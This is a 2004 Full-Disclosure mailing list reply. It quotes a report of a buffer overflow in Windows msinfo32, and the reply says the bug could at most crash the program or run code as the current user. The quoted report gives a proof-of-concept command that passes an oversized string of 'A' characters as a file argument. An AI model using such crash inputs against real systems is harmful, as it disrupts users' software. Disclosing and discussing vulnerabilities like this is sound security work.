I think at best you could succeed in crashing the process or executing code in the context of the user running msinfo32.
-----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of E.Kellinis Sent: Monday, August 30, 2004 11:17 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MSInfo Buffer Overflow <SNIP> Although in tests this bug wouldnt lead to dangerous situations.. I wouldnt bet 100% on that ! ===================== Proof Of Concept Code ===================== C:\Program Files\Common Files\Microsoft Shared\MSInfo> msinfo32 /msinfo_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
